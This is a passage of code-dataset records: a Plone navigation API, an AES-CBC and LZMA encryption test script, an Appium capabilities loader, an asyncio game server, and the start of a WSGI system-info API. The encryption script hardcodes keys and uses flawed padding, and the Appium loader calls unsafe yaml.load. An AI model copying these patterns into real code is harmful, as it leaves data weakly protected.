self._lookup_iface_by_identifier(interface))\n except ImportError:\n raise BadRequest(\"The provided `content_interfaces` could not be \"\n \"looked up: {}\".format(interface))\n return content_interfaces\n\n def solr_doc_to_node(self, solr_doc):\n wrapper = IContentListingObject(solr_doc)\n context_url = self.context.absolute_url()\n\n node = {\n '@type': wrapper.portal_type,\n 'text': wrapper.Title(),\n 'description': wrapper.Description(),\n 'url': wrapper.getURL(),\n 'uid': wrapper.UID,\n 'active': wrapper.review_state() != REPOSITORY_FOLDER_STATE_INACTIVE,\n 'current': context_url == wrapper.getURL(),\n 'current_tree': context_url.startswith(wrapper.getURL()),\n 'is_leafnode': None,\n 'is_subdossier': wrapper.is_subdossier,\n 'review_state': wrapper.review_state(),\n 'dossier_type': wrapper.dossier_type,\n }\n if wrapper.portal_type == 'opengever.repository.repositoryfolder':\n node['is_leafnode'] = not wrapper.has_sametype_children\n return json_compatible(node)\n\n\nclass NavigationGet(Service):\n\n def reply(self):\n navigation = Navigation(self.context, self.request)\n return navigation(expand=True)['navigation']\n", "sub_path": "opengever/api/navigation.py", "file_name": "navigation.py", "file_ext": "py", "file_size_in_byte": 8202, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "zope.component.getUtility", "line_number": 46, "usage_type": "call"}, {"api_name": "ftw.solr.interfaces.ISolrSearch", "line_number": 46, "usage_type": "argument"}, {"api_name": "opengever.base.browser.navigation.make_tree_by_url", "line_number": 
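Editor's note: _join_filters above composes Solr filter strings by parenthesising each filter and joining with the operator. A worked example with placeholder filter strings:

def join_filters(filters, op):
    # ['a:1', 'b:2'] with op='AND' -> '(a:1) AND (b:2)'
    return (' %s ' % op).join('(%s)' % flt for flt in filters)

main = join_filters(['portal_type:folder', 'trashed:false'], 'AND')
print(join_filters([main, 'UID:(a OR b)'], 'OR'))
# ((portal_type:folder) AND (trashed:false)) OR (UID:(a OR b))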
68, "usage_type": "call"}, {"api_name": "Products.CMFPlone.interfaces.siteroot.IPloneSiteRoot.providedBy", "line_number": 77, "usage_type": "call"}, {"api_name": "Products.CMFPlone.interfaces.siteroot.IPloneSiteRoot", "line_number": 77, "usage_type": "name"}, {"api_name": "Acquisition.aq_parent", "line_number": 78, "usage_type": "call"}, {"api_name": "Products.CMFPlone.interfaces.siteroot.IPloneSiteRoot.providedBy", "line_number": 87, "usage_type": "call"}, {"api_name": "Products.CMFPlone.interfaces.siteroot.IPloneSiteRoot", "line_number": 87, "usage_type": "name"}, {"api_name": "Acquisition.aq_parent", "line_number": 90, "usage_type": "call"}, {"api_name": "ftw.solr.query.make_filters", "line_number": 96, "usage_type": "call"}, {"api_name": "opengever.base.solr.OGSolrDocument", "line_number": 101, "usage_type": "call"}, {"api_name": "zExceptions.BadRequest", "line_number": 106, "usage_type": "call"}, {"api_name": "ftw.solr.query.make_filters", "line_number": 121, "usage_type": "call"}, {"api_name": "ftw.solr.query.make_filters", "line_number": 130, "usage_type": "call"}, {"api_name": "ftw.solr.query.make_filters", "line_number": 131, "usage_type": "call"}, {"api_name": "opengever.base.solr.OGSolrDocument", "line_number": 140, "usage_type": "call"}, {"api_name": "zope.dottedname.resolve.resolve", "line_number": 152, "usage_type": "call"}, {"api_name": "opengever.repository.repositoryroot.IRepositoryRoot", "line_number": 166, "usage_type": "name"}, {"api_name": "zExceptions.BadRequest", "line_number": 168, "usage_type": "call"}, {"api_name": "opengever.repository.interfaces.IRepositoryFolder", "line_number": 179, "usage_type": "name"}, {"api_name": "zExceptions.BadRequest", "line_number": 190, "usage_type": "call"}, {"api_name": "plone.app.contentlisting.interfaces.IContentListingObject", "line_number": 195, "usage_type": "call"}, {"api_name": "opengever.repository.repositoryfolder.REPOSITORY_FOLDER_STATE_INACTIVE", "line_number": 204, "usage_type": "name"}, {"api_name": "plone.restapi.serializer.converters.json_compatible", "line_number": 214, "usage_type": "call"}, {"api_name": "zope.interface.implementer", "line_number": 23, "usage_type": "call"}, {"api_name": "plone.restapi.interfaces.IExpandableElement", "line_number": 23, "usage_type": "argument"}, {"api_name": "zope.component.adapter", "line_number": 24, "usage_type": "call"}, {"api_name": "zope.interface.Interface", "line_number": 24, "usage_type": "argument"}, {"api_name": "opengever.base.interfaces.IOpengeverBaseLayer", "line_number": 24, "usage_type": "argument"}, {"api_name": "plone.restapi.services.Service", "line_number": 217, "usage_type": "name"}]} +{"seq_id": "412269518", "text": "# -*- coding: utf-8 -*-\n\nimport base64\nfrom Crypto.Cipher import AES\nfrom Crypto import Random\nfrom Crypto.Hash import SHA256\nimport pylzma\nimport os\nimport sys\nsys.path.insert(0, os.path.abspath('./encrepo'))\nimport hash_helper\nimport pack\nimport time\n\nBS = 32\nAES_KEY_SIZE = 32 #Key is 256 bit\npad = lambda s : s if len(s) % AES_KEY_SIZE == 0 else \\\n s + (AES_KEY_SIZE - len(s) % AES_KEY_SIZE) \\\n * chr(AES_KEY_SIZE - len(s) % AES_KEY_SIZE)\n\nunpad = lambda s : s if len(s) % AES_KEY_SIZE == 0 else \\\n s[:-ord(s[len(s)-1])]\n\nclass AESCipher:\n def __init__( self, key ):\n self.key = key\n\n def encrypt( self, raw ):\n raw = pad(raw)\n iv = Random.new().read( AES.block_size )\n cipher = AES.new( self.key, AES.MODE_CBC, iv )\n return base64.b64encode( iv + cipher.encrypt( raw ) )\n\n def decrypt( self, enc ):\n enc = 
base64.b64decode(enc)\n iv = enc[:16]\n cipher = AES.new(self.key, AES.MODE_CBC, iv )\n return unpad(cipher.decrypt( enc[16:] ))\n\nraw_info = \"\"\"awsome text goes here,\n U cannot see me,\n One good turn deserves another\"\"\"\n\nwith open('/home/xin/iprule') as input_file:\n raw_info = input_file.read()\n\nkey = 'abcdefghijklmnopqrstuvwxyz123456'\n\n\nkey = pad(key)\n\nAES_KEY = 'asdfas2\"%H:%M:%'\n\ndef test_compressed():\n print(\"key=%s length:%d\"%(key,len(key)))\n print(\"Original length of data:%d\"%len(raw_info))\n\n raw_hash = hash_helper.hash_str(raw_info)\n print(\"Original hash:%s\"%raw_hash)\n h = SHA256.new()\n h.update(raw_info)\n print(\"Original hashA:%s\"%h.hexdigest())\n\n\n compressed_info = pylzma.compress(raw_info)\n\n print(\"compressed length of data:%d\"%len(compressed_info))\n\n\n cf = AESCipher(key)\n encrypted = cf.encrypt(compressed_info)\n decrypted = cf.decrypt(encrypted)\n print(\"encrypted length of data:%d\"%len(encrypted))\n decompressed = pylzma.decompress(decrypted)\n print(\"Decrypted hash:%s\"%hash_helper.hash_str(decompressed))\n\n\n\n\ndef test_run1():\n print(\"Original length of data:%d\"%len(raw_info))\n raw_hash = hash_helper.hash_str(raw_info)\n print(\"Original hash:%s\"%raw_hash)\n\n cf = AESCipher(key)\n encrypted = cf.encrypt(raw_info)\n print(\"length of encrypted data:%d\"%len(encrypted))\n compressed_info = pylzma.compress(encrypted)\n print(\"compressed length of encrypted data:%d\"%len(compressed_info))\n\n decompressed = pylzma.decompress(compressed_info)\n decrypted = cf.decrypt(decompressed)\n print(\"Decrypted hash:%s\"%hash_helper.hash_str(decrypted))\n\n\ndef test_run2():\n info = \"the red fox jumps over the lazy dog\\n\"\n more_info = lambda i : '' if i ==0 else \\\n more_info(i-1) + 'Line {0:10d} : {1}'.format(i, info) * 100\n with open('/tmp/test.txt','w') as afile:\n afile.write(more_info(100))\n t0 = time.time()\n print(t0)\n t1 = t0\n t2 = t1\n print('{0}:....total={1:20f}, step={2:20f}'.format(\n time.strftime(\"%H:%M:%S\", time.localtime(t0)),\n t2 - t0,\n t2 - t1))\n\ndef noautorun_test_pack_large():\n t0 = time.time()\n print(t0)\n t1 = t0\n t2 = t1\n\n print('{0}:....total={1:12f}, step={2:12f}..starting'.format(\n time.strftime(\"%H:%M:%S\", time.localtime(t0)),\n t2 - t0,\n t2 - t1))\n\n #test_file = '/tmp/Inside.Out.2015.BD1080P.X264.AAC.English&Mandarin.CHS-ENG.Mp4Ba.mp4'\n test_file = '/home/xin/下载/头脑特工队.Inside.Out.2015.BD1080P.X264.AAC.English&Mandarin.CHS-ENG.Mp4Ba.mp4'\n with open(test_file) as afile:\n dgst_original = hash_helper.hash_file(afile)\n #dgst_original ='370cbba5943b5ba6ab868e9f0e098d8ccb8aa5f7396f82ebe22ac6a072c001f8'\n print(\"Original SHA256:%s\"%dgst_original)\n t2 = time.time()\n print('{0}:....total={1:12f}, step={2:12f}..dgst original'.format(\n time.strftime(\"%H:%M:%S\", time.localtime(t0)),\n t2 - t0,\n t2 - t1))\n t1 = t2\n packed_file_name = '/tmp/Inside.Out.2015.BD1080P.X264.AAC.English&Mandarin.CHS-ENG.Mp4Ba.mp4.pack'\n unpacked_file_name = '/tmp/Inside.Out.2015.BD1080P.X264.AAC.English&Mandarin.CHS-ENG.Mp4Ba.unpack.mp4'\n pack.pack_file(AES_KEY, test_file, packed_file_name)\n t2 = time.time()\n print('{0}:....total={1:12f}, step={2:12f}..packing..'.format(\n time.strftime(\"%H:%M:%S\", time.localtime(t0)),\n t2 - t0,\n t2 - t1))\n t1 = t2\n pack.unpack_file(AES_KEY, packed_file_name, unpacked_file_name)\n t2 = time.time()\n print('{0}:....total={1:12f}, step={2:12f}..Unpacking..'.format(\n time.strftime(\"%H:%M:%S\", time.localtime(t0)),\n t2 - t0,\n t2 - t1))\n t1 = t2\n with 
open(unpacked_file_name) as newfile:\n dgst_new = hash_helper.hash_file(newfile)\n\n\n t2 = time.time()\n print('{0}:....total={1:12f}, step={2:12f}..dgst result..'.format(\n time.strftime(\"%H:%M:%S\", time.localtime(t0)),\n t2 - t0,\n t2 - t1))\n t1 = t2\n print(\"New SHA256:%s\"%dgst_new)\n assert dgst_original == dgst_new\n\ndef noautorun_test_pad():\n with open('/tmp/3.mp4') as afile:\n s = afile.read()\n print(hash_helper.hash_str(s))\n encrypted = pack.encrypt(AES_KEY, s)\n decrypted = pack.decrypt1(AES_KEY, encrypted)\n print(hash_helper.hash_str(decrypted))\n print(unpad(hash_helper.hash_str(decrypted)))\n\ndef split_file_writer(file_name, split_size=32):\n file_size = split_size * 2 ** 20\n sum_len = [0]\n def write_file(buf):\n sum_len[0] += len(buf)\n file_no = sum_len[0] // file_size\n new_filename = file_name if file_no==0 else file_name+'.'+('0000'+str(file_no))[-4:]\n with open(new_filename,'a') as afile:\n afile.write(buf)\n return write_file\n\n\ndef split_file_reader(file_name):\n files = [open(file_name,'r')]\n file_no = [0]\n def read_file(buf_size):\n buf = files[0].read(buf_size)\n if len(buf) == 0:\n file_no[0] += 1\n files[0].close()\n try:\n files[0] = open(file_name+'.'+('0000'+str(file_no[0]))[-4:])\n return read_file(buf_size)\n except IOError:\n return ''\n else:\n return buf\n return read_file\n\ndef tester_split():\n original_file_name = '/home/xin/下载/头脑特工队.Inside.Out.2015.BD1080P.X264.AAC.English&Mandarin.CHS-ENG.Mp4Ba.mp4'\n splited_file_name = '/tmp/new/inside.out.mp4'\n recombined_file_name = '/tmp/inside.out.recombined.mp4'\n writer = split_file_writer(splited_file_name)\n\n with open(original_file_name) as afile:\n buf = afile.read(65536)\n while len(buf) >0 :\n writer(buf)\n buf = afile.read(65536)\n\ndef tester_combine():\n original_file_name = '/home/xin/下载/头脑特工队.Inside.Out.2015.BD1080P.X264.AAC.English&Mandarin.CHS-ENG.Mp4Ba.mp4'\n splited_file_name = '/tmp/new/inside.out.mp4'\n recombined_file_name = '/tmp/inside.out.recombined.mp4'\n reader = split_file_reader(splited_file_name)\n with open(recombined_file_name,'w') as afile:\n buf = reader(65536)\n while len(buf)>0:\n afile.write(buf)\n buf = reader(65536)\n\n dgst1 = hash_helper.hash_file(open(original_file_name))\n dgst2 = hash_helper.hash_file(open(recombined_file_name))\n\n assert dgst1 == dgst2\n\n\ntester_combine()\n", "sub_path": "encrypted_file_repo/test/test_run.py", "file_name": "test_run.py", "file_ext": "py", "file_size_in_byte": 7461, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.path.insert", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "Crypto.Random.new", "line_number": 30, "usage_type": "call"}, {"api_name": "Crypto.Random", "line_number": 30, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.block_size", "line_number": 30, "usage_type": "attribute"}, {"api_name": "Crypto.Cipher.AES", "line_number": 30, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 31, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 31, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.MODE_CBC", "line_number": 31, "usage_type": "attribute"}, {"api_name": "base64.b64encode", "line_number": 32, "usage_type": "call"}, {"api_name": 
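Editor's note: the pad/unpad pair above targets 32-byte multiples (the key size, not the cipher block size) and skips inputs already on a boundary, so unpad cannot distinguish padded from unpadded plaintext. CBC padding should target AES.block_size (16) and always pad, as PKCS#7 does. A minimal sketch with pycryptodome:

from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes

BLOCK = AES.block_size  # 16: CBC padding must target the cipher block size

def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK   # always pad, even on a block boundary
    return data + bytes([n]) * n

def pkcs7_unpad(data: bytes) -> bytes:
    return data[:-data[-1]]         # the last byte encodes the pad length

key = get_random_bytes(32)          # AES-256
iv = get_random_bytes(BLOCK)
ct = AES.new(key, AES.MODE_CBC, iv).encrypt(pkcs7_pad(b"attack at dawn"))
pt = pkcs7_unpad(AES.new(key, AES.MODE_CBC, iv).decrypt(ct))
assert pt == b"attack at dawn"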
"base64.b64decode", "line_number": 35, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 37, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 37, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.MODE_CBC", "line_number": 37, "usage_type": "attribute"}, {"api_name": "hash_helper.hash_str", "line_number": 58, "usage_type": "call"}, {"api_name": "Crypto.Hash.SHA256.new", "line_number": 60, "usage_type": "call"}, {"api_name": "Crypto.Hash.SHA256", "line_number": 60, "usage_type": "name"}, {"api_name": "pylzma.compress", "line_number": 65, "usage_type": "call"}, {"api_name": "pylzma.decompress", "line_number": 74, "usage_type": "call"}, {"api_name": "hash_helper.hash_str", "line_number": 75, "usage_type": "call"}, {"api_name": "hash_helper.hash_str", "line_number": 82, "usage_type": "call"}, {"api_name": "pylzma.compress", "line_number": 88, "usage_type": "call"}, {"api_name": "pylzma.decompress", "line_number": 91, "usage_type": "call"}, {"api_name": "hash_helper.hash_str", "line_number": 93, "usage_type": "call"}, {"api_name": "time.time", "line_number": 102, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 107, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 107, "usage_type": "call"}, {"api_name": "time.time", "line_number": 112, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 118, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 118, "usage_type": "call"}, {"api_name": "hash_helper.hash_file", "line_number": 125, "usage_type": "call"}, {"api_name": "time.time", "line_number": 128, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 130, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 130, "usage_type": "call"}, {"api_name": "pack.pack_file", "line_number": 136, "usage_type": "call"}, {"api_name": "time.time", "line_number": 137, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 139, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 139, "usage_type": "call"}, {"api_name": "pack.unpack_file", "line_number": 143, "usage_type": "call"}, {"api_name": "time.time", "line_number": 144, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 146, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 146, "usage_type": "call"}, {"api_name": "hash_helper.hash_file", "line_number": 151, "usage_type": "call"}, {"api_name": "time.time", "line_number": 154, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 156, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 156, "usage_type": "call"}, {"api_name": "hash_helper.hash_str", "line_number": 166, "usage_type": "call"}, {"api_name": "pack.encrypt", "line_number": 167, "usage_type": "call"}, {"api_name": "pack.decrypt1", "line_number": 168, "usage_type": "call"}, {"api_name": "hash_helper.hash_str", "line_number": 169, "usage_type": "call"}, {"api_name": "hash_helper.hash_str", "line_number": 170, "usage_type": "call"}, {"api_name": "hash_helper.hash_file", "line_number": 224, "usage_type": "call"}, {"api_name": "hash_helper.hash_file", "line_number": 225, "usage_type": "call"}]} +{"seq_id": "340990095", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom commons import logger\nimport os\n\nimport yaml\nfrom appium import webdriver\n\nlogger = logger.Logger().getLogger()\n\n\ndef appium_desired():\n dirname = os.path.dirname(os.path.dirname(__file__))\n filename = 
os.path.join(dirname, 'config/kyb_caps.yaml')\n with open(filename, 'r', encoding='utf-8') as file:\n data = yaml.load(file)\n\n base_dir = os.path.dirname(os.path.dirname(__file__))\n app_path = os.path.join(base_dir, 'app', data['appname'])\n desired_caps = {\n \"platformName\": data['platformName'],\n \"platformVersion\": data['platformVersion'],\n\n \"deviceName\": data['deviceName'],\n \"udid\": data['udid'],\n\n \"app\": app_path,\n \"appPackage\": data['appPackage'],\n \"appActivity\": data['appActivity'],\n\n \"automationName\": data['automationName'],\n \"noReset\": data['noReset'],\n\n \"unicodeKeyboard\": data['unicodeKeyboard'],\n \"resetKeyboard\": data['resetKeyboard']\n }\n logger.info('start app......')\n\n driver = webdriver.Remote('http://' + str(data['ip']) + ':' + str(data['port']) + '/wd/hub', desired_caps)\n driver.implicitly_wait(3)\n return driver\n\n\nif __name__ == '__main__':\n appium_desired()\n", "sub_path": "commons/desired_caps.py", "file_name": "desired_caps.py", "file_ext": "py", "file_size_in_byte": 1255, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "commons.logger", "line_number": 9, "usage_type": "name"}, {"api_name": "commons.logger.Logger", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "commons.logger.info", "line_number": 37, "usage_type": "call"}, {"api_name": "commons.logger", "line_number": 37, "usage_type": "name"}, {"api_name": "appium.webdriver.Remote", "line_number": 39, "usage_type": "call"}, {"api_name": "appium.webdriver", "line_number": 39, "usage_type": "name"}]} +{"seq_id": "200320471", "text": "#!/usr/bin/python3\n\nimport spaceking.net as net\nimport spaceking.common as com\nimport spaceking.log as log\nimport spaceking.event as ev\n\nimport shutil\nimport atexit\nimport os\nimport tempfile\nimport asyncio\nimport socket\n\nEVT_SERVER_RUNNING = 15000\nEVT_SERVER_QUIT = 15001\nEVT_SERVER_CONNECTED = 15002\nEVT_SERVER_DISCONNECTED = 15003\nEVT_SERVER_FAILED_JOIN = 15004\nEVT_SERVER_FAILED_CLIENT = 15005\nEVT_SERVER_NEW_CLIENT = 15006\nEVT_SERVER_DISCONNECTED_CLIENT = 15007\n\n\nclass ServerClient:\n\n __slots__ = [\"uid\", \"addr\", \"reader\", \"writer\"]\n\n def __init__(self, uid, addr, reader, writer):\n self.uid = uid\n self.addr = addr\n self.reader = reader\n self.writer = writer\n\n def __str__(self):\n return \"client: uid={0}, addr={1}\".format(self.uid, self.addr)\n\n\nclass ServerConnection(net.Connection):\n \"\"\"Game server\"\"\"\n\n MAX_CLIENTS = 16\n\n def __init__(self,\n bind_to=None,\n loop=asyncio.get_event_loop(),\n socket_type=\"tcp\"):\n \"\"\"NOTE: with socket_type = unix, the bind_to needs to be None or a\n temporary directory. 
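Editor's note: yaml.load(file) without an explicit Loader, as in the capability loader above, is deprecated in PyYAML 5.x and can construct arbitrary Python objects; safe_load is the usual choice for a config file. A small sketch (the path and keys follow the record above):

import yaml

with open('config/kyb_caps.yaml', 'r', encoding='utf-8') as file:
    data = yaml.safe_load(file)  # safe YAML subset; enough for plain config
print(data['platformName'], data['deviceName'])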
This directory is removed on exit.\"\"\"\n super().__init__()\n self.clients = []\n self.server = None\n self._uid_cursor = 0 # ringbuf cur.\n self.loop = loop\n\n self.proto_map = {\n \"tcp\": self._start_tcp_server,\n \"unix\": self._start_unix_server\n }\n if socket_type not in self.proto_map:\n raise ValueError(\"socket type: {0} not valid.\".format(socket_type))\n self.socket_type = socket_type\n\n if bind_to is None:\n if socket_type == \"unix\":\n self.bind_to = self._unique_unix_socket_path()\n else:\n self.bind_to = \"localhost\"\n else:\n self.bind_to = bind_to\n\n self.register_handler(net.EVT_PACKET_SEND, self.handle_packet_send)\n\n def _unique_unix_socket_path(self):\n directory = tempfile.mkdtemp(prefix=\"sock-serv\", dir=com.CONFIG_HOME)\n sock_name = \"socket\"\n return os.path.join(directory, \"socket\")\n\n def _create_client(self, uid, *args, **kwargs):\n client = ServerClient(uid, *args, **kwargs)\n self._add_client(client)\n\n def create_evt(pkt):\n return net.NetEvent(net.EVT_PACKET_RECV, uid, pkt)\n\n # Server listens for client packets\n coro = self.listen_packets(client.reader, create_evt)\n task = asyncio.Task(coro, loop=self.loop)\n # Cleanup on socket death\n task.add_done_callback(lambda t: self.disconnect_client(client, t))\n return client\n\n def _add_client(self, client):\n self.clients.append(client)\n\n def _remove_client_by_uid(self, uid):\n for idx, client in enumerate(self.clients):\n if idx == uid:\n del self.clients[idx]\n\n def _get_client_by_uid(self, uid):\n for idx, client in enumerate(self.clients):\n if client.uid == uid:\n return self.clients[idx]\n\n def _next_uid(self):\n # Spawn new unique client ID. ring used for simplicity.\n uid = self._uid_cursor\n self._uid_cursor = (uid + 1) % ServerConnection.MAX_CLIENTS\n return uid\n\n def get_client_count(self):\n return len(self.clients)\n\n @asyncio.coroutine\n def accept_client(self, reader, writer):\n uid = self._next_uid()\n\n remote_addr = self._get_addr(writer)\n if remote_addr is None:\n log.warn(\"Error on client uid={0} connect.\".format(uid))\n return\n\n client = self._create_client(uid, remote_addr, reader, writer)\n\n yield from self.notify(net.NetEvent(EVT_SERVER_NEW_CLIENT, uid))\n log.info(\"{0} connected.\".format(client))\n\n @asyncio.coroutine\n def handle_packet_send(self, event):\n client = self._get_client_by_uid(event.uid)\n if client is None:\n return\n try:\n yield from self.send_packets(client.writer, event.pkt)\n except socket.error as err:\n log.debug(\"Error while sending packets to {0}\".format(client))\n self.disconnect_client(client)\n return\n\n def disconnect_client_by_uid(self, uid):\n # task of disconnect notification is returned\n self._remove_client_by_uid(uid)\n event = net.NetEvent(EVT_SERVER_DISCONNECTED_CLIENT, uid)\n\n task = asyncio.Task(self.notify(event), loop=self.loop)\n return task\n\n def disconnect_client(self, client, client_task=None):\n if client_task:\n try:\n result = client_task.result()\n except Exception as err:\n msg = \"{0} completed with an error. 
{1}\".format(client, err)\n log.debug(msg)\n\n log.info(\"{0} disconnected.\".format(client))\n self.disconnect_client_by_uid(client.uid)\n\n def _start_server(self, coro):\n try:\n self.server = self.loop.run_until_complete(coro)\n except Exception as err:\n log.error(\"server connection crashed on startup\")\n raise err\n\n def _start_tcp_server(self):\n self._start_server(asyncio.start_server(self.accept_client,\n loop=self.loop,\n host=self.bind_to,\n port=net.SERVER_PORT,\n reuse_address=True))\n\n def _start_unix_server(self):\n def socket_cleanup():\n shutil.rmtree(os.path.dirname(self.bind_to))\n log.debug(\"UNIX socket {0} cleaned up.\".format(self.bind_to))\n\n atexit.register(socket_cleanup)\n self._start_server(asyncio.start_unix_server(self.accept_client,\n path=self.bind_to,\n loop=self.loop))\n\n def start_server(self):\n self.proto_map[self.socket_type]()\n\n log.info(\"spaceking server listening.\")\n self.notify(net.NetEvent(EVT_SERVER_RUNNING, None))\n\n def quit(self):\n log.debug(\"spaceking server connection shutting down.\")\n if self.server:\n self.server.close()\n self.server = None\n self.notify(net.NetEvent(EVT_SERVER_QUIT, None))\n else:\n log.debug(\"Calling quit on a dead server\")\n", "sub_path": "spaceking/server/net.py", "file_name": "net.py", "file_ext": "py", "file_size_in_byte": 6412, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "spaceking.net.Connection", "line_number": 39, "usage_type": "attribute"}, {"api_name": "spaceking.net", "line_number": 39, "usage_type": "name"}, {"api_name": "asyncio.get_event_loop", "line_number": 46, "usage_type": "call"}, {"api_name": "spaceking.net.EVT_PACKET_SEND", "line_number": 72, "usage_type": "attribute"}, {"api_name": "spaceking.net", "line_number": 72, "usage_type": "name"}, {"api_name": "tempfile.mkdtemp", "line_number": 75, "usage_type": "call"}, {"api_name": "spaceking.common.CONFIG_HOME", "line_number": 75, "usage_type": "attribute"}, {"api_name": "spaceking.common", "line_number": 75, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "spaceking.net.NetEvent", "line_number": 84, "usage_type": "call"}, {"api_name": "spaceking.net", "line_number": 84, "usage_type": "name"}, {"api_name": "spaceking.net.EVT_PACKET_RECV", "line_number": 84, "usage_type": "attribute"}, {"api_name": "asyncio.Task", "line_number": 88, "usage_type": "call"}, {"api_name": "spaceking.log.warn", "line_number": 121, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 121, "usage_type": "name"}, {"api_name": "spaceking.net.NetEvent", "line_number": 126, "usage_type": "call"}, {"api_name": "spaceking.net", "line_number": 126, "usage_type": "name"}, {"api_name": "spaceking.log.info", "line_number": 127, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 127, "usage_type": "name"}, {"api_name": "asyncio.coroutine", "line_number": 115, "usage_type": "attribute"}, {"api_name": "socket.error", "line_number": 136, "usage_type": "attribute"}, {"api_name": "spaceking.log.debug", "line_number": 137, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 137, "usage_type": "name"}, {"api_name": "asyncio.coroutine", "line_number": 129, "usage_type": "attribute"}, {"api_name": "spaceking.net.NetEvent", "line_number": 144, "usage_type": "call"}, {"api_name": "spaceking.net", "line_number": 144, "usage_type": 
"name"}, {"api_name": "asyncio.Task", "line_number": 146, "usage_type": "call"}, {"api_name": "spaceking.log.debug", "line_number": 155, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 155, "usage_type": "name"}, {"api_name": "spaceking.log.info", "line_number": 157, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 157, "usage_type": "name"}, {"api_name": "spaceking.log.error", "line_number": 164, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 164, "usage_type": "name"}, {"api_name": "asyncio.start_server", "line_number": 168, "usage_type": "call"}, {"api_name": "spaceking.net.SERVER_PORT", "line_number": 171, "usage_type": "attribute"}, {"api_name": "spaceking.net", "line_number": 171, "usage_type": "name"}, {"api_name": "shutil.rmtree", "line_number": 176, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 176, "usage_type": "call"}, {"api_name": "os.path", "line_number": 176, "usage_type": "attribute"}, {"api_name": "spaceking.log.debug", "line_number": 177, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 177, "usage_type": "name"}, {"api_name": "atexit.register", "line_number": 179, "usage_type": "call"}, {"api_name": "asyncio.start_unix_server", "line_number": 180, "usage_type": "call"}, {"api_name": "spaceking.log.info", "line_number": 187, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 187, "usage_type": "name"}, {"api_name": "spaceking.net.NetEvent", "line_number": 188, "usage_type": "call"}, {"api_name": "spaceking.net", "line_number": 188, "usage_type": "name"}, {"api_name": "spaceking.log.debug", "line_number": 191, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 191, "usage_type": "name"}, {"api_name": "spaceking.net.NetEvent", "line_number": 195, "usage_type": "call"}, {"api_name": "spaceking.net", "line_number": 195, "usage_type": "name"}, {"api_name": "spaceking.log.debug", "line_number": 197, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 197, "usage_type": "name"}]} +{"seq_id": "194247979", "text": "# coding:utf-8\n\nimport logging\nimport psutil \nimport time\nimport json\nimport winreg\nimport requests\nimport os\nimport subprocess\nimport globalvar as gl\nfrom urllib.parse import parse_qs\n\n\nlogging.basicConfig(level=logging.DEBUG,format=' %(asctime)s - %(levelname)s - %(message)s')\n#logging.disable(logging.CRITICAL) # 加这句话,就是log全部禁止,不加,就可以log打印了\n\n\n\n# 定义函数,两个参数,都是python本身定义的,默认就行了。\ndef application(environ, start_response):\n \n recordLog('start in webapi')\n # 定义文件请求的类型和当前请求成功的code\n try:\n start_response('200 OK', [('Content-Type', 'application/json;charset=utf-8')])\n d = parse_qs(environ['QUERY_STRING'])\n recordLog(environ['QUERY_STRING'])\n key = d.get('key', [''])[0] # 返回第一个age值.\n recordLog(key)\n except Exception as err:\n recordLog('web err!')\n recordLog(str(err))\n \n \n\n # 获取服务器的硬件运行信息\n if key=='getinfo':\n info=sysInfo()\n json_str = json.dumps(info,ensure_ascii=False,indent=4)\n recordLog('record getinfo')\n recordLog(json.dumps(json_str))\n return [json_str.encode('utf-8')]\n \n # 主动触发服务器下载最新版的热更新\n 